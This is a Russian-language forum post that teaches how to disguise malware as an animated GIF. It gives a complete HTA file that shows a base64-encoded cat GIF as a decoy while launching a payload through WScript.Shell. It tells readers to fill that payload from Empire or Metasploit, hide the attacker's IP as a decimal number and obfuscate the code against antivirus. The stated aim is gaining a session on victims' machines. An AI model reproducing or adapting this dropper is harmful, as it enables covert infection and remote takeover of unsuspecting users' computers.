Зашиваем вирус в GIF​

Нашел для вас метод заражения наших с вами "любимых клиентов". Все будет, как Мы любим: весело, легко и скрытно)



Поехали!
Гифка была выбрана эта, остается разобраться с кодом:

Для начала генерируем powershell в Empire или Metasploit

я выбрал ..
​

​

>>>КОД СКРИПТА<<<
​

1. <html>​
2. <head>​
3. <title>NazvanieGif</title>​
4. <hta:application id="NazvanieGif"​
5. border="thin"​
6. borderstyle="complex"​
7. maximizeButton="no"​
8. minimizeButton="no"​
9. />​
10. </head>​
11. <script type="text/javascript">​
12. var index = -1;​
13. var images = [​
14. "data:image/gif;base64,"];​
15. function initGallery(){​
16. window.resizeTo(300,300);​
17. htaPayload();​
18. nextPicture();​
19. }​
20. function nextPicture(){​
21. var img;​
22. index = index + 1;​
23. if (index > images.length -1 ){​
24. index = 0;​
25. }​
26. img = document.getElementById("gallery");​
27. img.src = images[index];​
28. }​
29. function htaPayload(){​
30. var payload="";​
31. try{​
32. if (navigator.userAgent.indexOf("Windows") !== -1){​
33. new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);​
34. }​
35. }​
36. catch(e){​
37. }​
38. }​
39. </script>​
40. <style>​
41. #gallery, div {​
42. width: 100%;​
43. height: 100%;​
44. }​
45. #outer {​
46. text-align: center;​
47. }​
48. #inner{​
49. display: inline-block;​
50. }​
51. body {​
52. background-color: black;​
53. }​
54. </style>​
55. <body onload="initGallery()">​
56. <div id="outer">​
57. <div id="inner">​
58. <img id="gallery" onclick="nextPicture()">​
59. </div>​
60. </div>​
61. </body>​
62. </html>​

и вставляем в 37 строчку между:


Далее переходим на очень полезный онлайн ресурс

Иногда он выручает для различного рода задач, например, при кодировке IP адреса в бинарник для последующего его скрытия.

Немножечко отступлю от темы покажу: например скрываем 127.0.0.1

127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433

Такти образом переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в



​

​

Как видите в 17 строку)



Осталось последнее действие конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной программе

Сохраняем полученный код в блокноте, под любым именем, но в формате .hta​

Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котиком, а к Вам прилетит заветная сессия)

Всем успехов!

Изучай, практикуй, развивайся!

 

ааааааааааааааа очень сложно обьясните пожалуйста кто сможет в лс